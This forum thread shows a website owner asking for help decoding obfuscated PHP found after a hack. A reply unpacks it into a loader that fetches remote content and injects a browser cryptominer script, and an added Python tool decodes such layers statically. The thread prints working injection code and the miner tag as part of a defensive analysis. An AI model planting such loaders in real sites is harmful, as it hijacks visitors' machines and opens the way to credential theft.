Hi, I can't decode this



Post by sharp_shadow on Tue Dec 12, 2017 1:21 pm

Hi, my website was hacked. And this code was on it.
I tried to decode it to see what it does.

I have basic html/css/php/jquery knowledge and tried to decode this using base64 and utf8 decoders.
I still get code that's unreadable for me.

Does anyone know how to decode this?

<?php
$l1="\x63\x72e"."\x61\x74e\x5F"."\x66\x75\x6E"."\x63\x74\x69"."\x6F\x6E";$ll=@$l1('$x',"e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));');@$ll("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");?>


Greetings and thanks in advance, Sharp_Shadow
sharp_shadow
New User
Posts: 2
Joined: Tue Dec 12, 2017 1:17 pm


Re: Hi, I can't decode this

Post by boriz666 on Wed Dec 13, 2017 8:52 am

We are given this code:
========================

$l1="\x63\x72e"."\x61\x74e\x5F"."\x66\x75\x6E"."\x63\x74\x69"."\x6F\x6E";
$ll=@$l1('$x',"e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));');

@$ll("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");


We have split it up to make it more readable.

To figure out what this does we go to a sandbox on the internet,
so we don't have to run it on our own machine, or we could run it in a VM.

http://sandbox.onlinephpfunctions.com/

To check what $l1 translates to, we run the following code in the code tester:

<?php

$l1="\x63\x72e"."\x61\x74e\x5F"."\x66\x75\x6E"."\x63\x74\x69"."\x6F\x6E";
echo($l1);


Here we get "create_function".
We now know that $l1 contains the string create_function.

On the next line we know that @$l1 contains create_function, so the resulting code is

create_function('$x',"e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));');


From the manual we can see that create_function takes a set of variables for the parameters
of the created function, here it's $x; the next argument to create_function is:
"e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));'

Which we just print out with echo:
<?php
echo("e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));');


and we get:

eval("?>".gzinflate(base64_decode($x)));

which is run in the next line of the original code with a large string.

eval("?>".gzinflate(base64_decode("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")));


To check what is eval'ed we just echo the result of gzinflate(base64_decode(..)); again using
the online code tester.

<?php
echo(gzinflate(base64_decode("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")));


We then get:


<?php
$ua=strtolower($_SERVER['HTTP_USER_AGENT']);
if(strpos($ua,"bot")===false){
   $url='https://raw.githubusercontent.com/xmrstudio/mrs/master/rj.c';
   try{
      if(function_exists('file_get_contents')){
         ini_set('user_agent',$ua);
         $cont=@file_get_contents($url);
      }
      if(strlen($cont)<1&&function_exists('curl_init')){
         $ch=curl_init();
         $timeout=30;
         curl_setopt($ch,CURLOPT_URL,$url);
         curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
         curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
         curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
         curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
         curl_setopt($ch,CURLOPT_USERAGENT,$ua);
         $cont=curl_exec($ch);
         curl_close($ch);
      }
      $cont=gzinflate(base64_decode($cont));
      $arr=explode('[###]',$cont);
      echo $arr[array_rand($arr)];
   }catch(Exception $e){}
}
?>


This is eval'ed, which means the PHP preprocessor runs the code above, which
fetches the content of the URL https://raw.githubusercontent.com/xmrst ... aster/rj.c
and base64 decodes it, gzinflates it and prints it.

The file contents of rj.c are:

xZFRS8MwFIX/ytgetoGk7XAwtQ5ko5s6mJuioPjQZrFJ1yZpbrq2E/+7dRP1QUEWcU8X7j3kfOfEBayY1DVQ+LRuWVGKF7yDKFFimflSIiySapkRVaII6n3X2ur77vvkJK9Fs839jAteJiKDVpP7XDQPnjVVQuuYHNuo89JGoH2lW+2Tj0ceGo3Go/sNge0YIySMEyME8xYMEKCoEPZaQrIl4CJHQP/XOpd/Ej6DwqT9w92zQyZNnLvG0XcHwIJxylZkYxyz4HNRfejPCINKNX5TfYEIveLWwUe9dK2cc29AvTCeXj8FNhvOhdO1e/snnMTgr+zR/HISDMP0BqKxXI5mdwt5sb4ntLz6BeEr


We run the following in the code tester:

<?php

$cont='xZFRS8MwFIX/ytgetoGk7XAwtQ5ko5s6mJuioPjQZrFJ1yZpbrq2E/+7dRP1QUEWcU8X7j3kfOfEBayY1DVQ+LRuWVGKF7yDKFFimflSIiySapkRVaII6n3X2ur77vvkJK9Fs839jAteJiKDVpP7XDQPnjVVQuuYHNuo89JGoH2lW+2Tj0ceGo3Go/sNge0YIySMEyME8xYMEKCoEPZaQrIl4CJHQP/XOpd/Ej6DwqT9w92zQyZNnLvG0XcHwIJxylZkYxyz4HNRfejPCINKNX5TfYEIveLWwUe9dK2cc29AvTCeXj8FNhvOhdO1e/snnMTgr+zR/HISDMP0BqKxXI5mdwt5sb4ntLz6BeEr';

$cont=gzinflate(base64_decode($cont));
$arr=explode('[###]',$cont);
echo $arr[array_rand($arr)];



And we get the following result:

<script src="//mxcdn1.now.sh/jquery.js"></script><script>new jQuery.Anonymous('mine',{throttle:0.2}).start();</script>


Which is output to your site.

This is a mining script that uses the visitor's computer to mine cryptocurrency.
It's made in a way that obfuscates what it does, but it's just a stupid attempt which can be
figured out with the easy method above.

Be aware that the attacker can replace the content of https://raw.githubusercontent.com/xmrst ... aster/rj.c
with any JavaScript code, which could potentially steal login cookies, read form fields, or skim credit card
numbers, if you have forms like that on your site.
boriz666
Experienced User
Posts: 99
Joined: Tue Mar 24, 2015 11:53 am
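The three-layer unpacking boriz666 walks through above (hex-escaped function name, a create_function body, then gzinflate(base64_decode($x)) over a packed blob) can also be done without executing any of the attacker's code, which avoids both the sandbox and the VM. The Python script below is an added example, not code from the thread or its posters: it statically evaluates PHP string-literal concatenations with \xHH escapes, finds the create_function call and decodes its body, and reverses the packing with zlib in raw-deflate mode (PHP's gzinflate reads RFC 1951 raw DEFLATE). It goes slightly beyond the single case in the thread by resolving every `$name = "..."."...";` assignment in the source and by listing the execution/decoding primitives the decoded body calls, which is the signal a defender would turn into a detection rule. The source string and the packed payload are constructed here; the real blob is not included.

```python
import base64
import re
import zlib

# One PHP token: double-quoted literal (g1), single-quoted literal (g2) or the '.' operator (g3).
_TOKEN = re.compile(r"""\s*(?:"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'|(\.))""", re.DOTALL)
_DQ_ESC = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|.)', re.DOTALL)
_SIMPLE = {'n': '\n', 't': '\t', 'r': '\r', 'v': '\v', 'f': '\f', 'e': '\x1b', '\\': '\\', '$': '$', '"': '"'}
# `$name = <string literals joined by '.'>;`  and  `$f = @$v('$args', <literals...`
_ASSIGN = re.compile(r"""\$(\w+)\s*=\s*((?:"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|\s*\.\s*)+)\s*;""", re.DOTALL)
_CF_CALL = re.compile(r"\$(\w+)\s*=\s*@?\$(\w+)\s*\(\s*'([^']*)'\s*,")
LOADER_PRIMITIVES = ("eval", "create_function", "assert", "gzinflate", "base64_decode", "str_rot13")

def _unescape_double(body):
    """PHP double-quote escapes (\\xHH, octal, \\n, \\\\, \\$ ...); unknown escapes keep the backslash."""
    def repl(m):
        esc = m.group(1)
        if esc[0] == 'x' and len(esc) > 1:
            return chr(int(esc[1:], 16))
        return chr(int(esc, 8) & 0xFF) if esc[0] in '01234567' else _SIMPLE.get(esc, '\\' + esc)
    return _DQ_ESC.sub(repl, body)

def _scan_concat(text, pos=0):
    """Consume `lit . lit . lit` starting at pos, executing nothing; return (value, end offset)."""
    parts, want_literal = [], True
    while (m := _TOKEN.match(text, pos)) is not None:
        if m.group(3) is not None:              # the '.' operator
            if want_literal:
                break
            want_literal = True
        elif not want_literal:                  # two literals with no '.' between them
            break
        else:                                   # single quotes: only \' and \\ are escapes
            parts.append(_unescape_double(m.group(1)) if m.group(1) is not None
                         else re.sub(r"\\([\\'])", r"\1", m.group(2)))
            want_literal = False
        pos = m.end()
    if not parts or want_literal:
        raise ValueError(f"no pure string-literal concatenation at offset {pos}")
    return "".join(parts), pos

def php_concat_eval(expr):
    """Statically evaluate an expression made only of string literals joined by '.'."""
    value, end = _scan_concat(expr.strip())
    if end != len(expr.strip()):
        raise ValueError(f"unsupported token at offset {end}")
    return value

def resolve_string_assignments(php_src):
    """{name: decoded value} for every `$name = "..." . '...';` in the source."""
    return {name: php_concat_eval(expr) for name, expr in _ASSIGN.findall(php_src)}

def find_created_functions(php_src, names):
    """{f: (args, body)} for each `$f = @$v('$args', <literals>)` where $v resolved to create_function."""
    created = {}
    for m in _CF_CALL.finditer(php_src):
        if names.get(m.group(2)) == "create_function":
            created[m.group(1)] = (m.group(3), _scan_concat(php_src, m.end())[0])
    return created

def loader_indicators(code):
    """Execution/decoding primitives called in decoded code; useful as a triage/detection signal."""
    return sorted(p for p in LOADER_PRIMITIVES if re.search(r'\b' + p + r'\s*\(', code))

def php_gzdeflate(data):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw DEFLATE (RFC 1951): what gzinflate() reads
    return c.compress(data) + c.flush()

def php_gzinflate_base64(blob):
    """Reverse gzinflate(base64_decode($x)) offline; rejects non-base64 input."""
    return zlib.decompress(base64.b64decode(blob, validate=True), -15).decode("utf-8", "replace")

def extract_base64_arg(php_src):
    """Longest base64-looking string passed as the sole double-quoted call argument (ValueError if none)."""
    return max(re.findall(r'\("([A-Za-z0-9+/]{16,}={0,2})"\)', php_src), key=len)

def unpack(php_src):
    """Walk all three layers (hex-escaped names, created function body, packed blob) without running PHP."""
    names = resolve_string_assignments(php_src)
    created = find_created_functions(php_src, names)
    payload = php_gzinflate_base64(extract_base64_arg(php_src))
    return {"resolved": names, "created": created,
            "indicators": loader_indicators(" ".join(body for _, body in created.values())),
            "payload_chunks": payload.split("[###]")}

# Constructed sample, not the thread's real blob: the two string expressions quoted in the
# thread, plus a harmless "[###]"-separated payload packed the same way the loader expects.
L1_EXPR = r'"\x63\x72e"."\x61\x74e\x5F"."\x66\x75\x6E"."\x63\x74\x69"."\x6F\x6E"'
BODY_EXPR = r""" "e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));' """
INNER_TEXT = "<!-- sample chunk A -->[###]<!-- sample chunk B -->"
INNER_BLOB = base64.b64encode(php_gzdeflate(INNER_TEXT.encode())).decode()
SAMPLE_SRC = "<?php $l1=" + L1_EXPR + ";$ll=@$l1('$x'," + BODY_EXPR.strip() + ');@$ll("' + INNER_BLOB + '");?>'

if __name__ == "__main__":
    print(unpack(SAMPLE_SRC))
```

Running the script prints the resolved name (`create_function`), the decoded body `eval("?>".gzinflate(base64_decode($x)));`, the indicator list and the two payload chunks, all derived from the text alone. For a real incident, the same `unpack` call can be pointed at the infected file, and `loader_indicators` applied to any decoded stage is a cheap way to decide whether a further layer needs unpacking; the script deliberately never calls `eval` or fetches anything, so it is safe to run against a copy of the compromised site.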


Re: Hi, I can't decode this

Post by sharp_shadow on Fri Dec 15, 2017 5:01 am

Wow thanks for the explanation! :D
You know a lot.
sharp_shadow
New User
Posts: 2
Joined: Tue Dec 12, 2017 1:17 pm


Re: Hi, I can't decode this

Post by oasis on Sat Dec 16, 2017 2:39 am

I enjoyed reading your breakdown. Good work.

@Sharp_shadow did you find out how he hacked your website?
oasis
New User
Posts: 23
Joined: Thu Apr 24, 2008 12:57 pm


